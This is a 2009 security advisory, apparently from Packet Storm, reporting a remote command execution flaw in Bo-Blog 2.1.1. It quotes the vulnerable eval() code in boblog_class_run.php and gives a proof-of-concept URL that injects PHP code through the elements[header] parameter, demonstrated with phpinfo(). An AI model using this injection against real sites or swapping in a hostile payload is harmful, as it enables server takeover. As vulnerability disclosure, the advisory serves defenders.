Bo-Blog 2.1.1 Command Execution

2009-09-10T00:00:00
ID PACKETSTORM:81162
Type packetstorm
Reporter Securitylab Security Research
Modified 2009-09-10T00:00:00

Description

                                        
                                            `########################## Securitylab.ir ########################  
# Application Info:  
# Name: bo-blog  
# Version: 2.1.1  
# Download: http://www.bo-blog.com/download/release/Bo-blogV2.1.1.tar.gz  
#################################################################  
# Discoverd By: Securitylab.ir  
# Website: http://securitylab.ir  
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir  
#################################################################  
# Vulnerability Info:  
# Type: Remote Command Execution Vulnerabilities  
# Risk: High  
#===========================================================  
# boblog_class_run.php (in /inc/ folder)  
#  
# <...  
# function set($elementname, $array, $inherit=0) {  
# global $elements, $tptvalue;  
# if ($inherit==1) global $content;  
# $content[$elementname]=$elements[$elementname];  
#  
#  
# $a=preg_match("/<!-- php --><!--(.+?)--><!-- \/php -->/is", $content  
#  
#[$elementname], $phpcode_array);  
# if ($a!=0) {  
# $phpcode=$phpcode_array[1];  
# eval($phpcode);  
# ...>  
#  
# http://localhost/blog/inc/boblog_class_run.php?elements[header]=<!-- php --><!--phpinfo();--><!-- /php -->  
#===========================================================  
#################################################################  
# Securitylab Security Research Team  
###################################################################  
  
  
`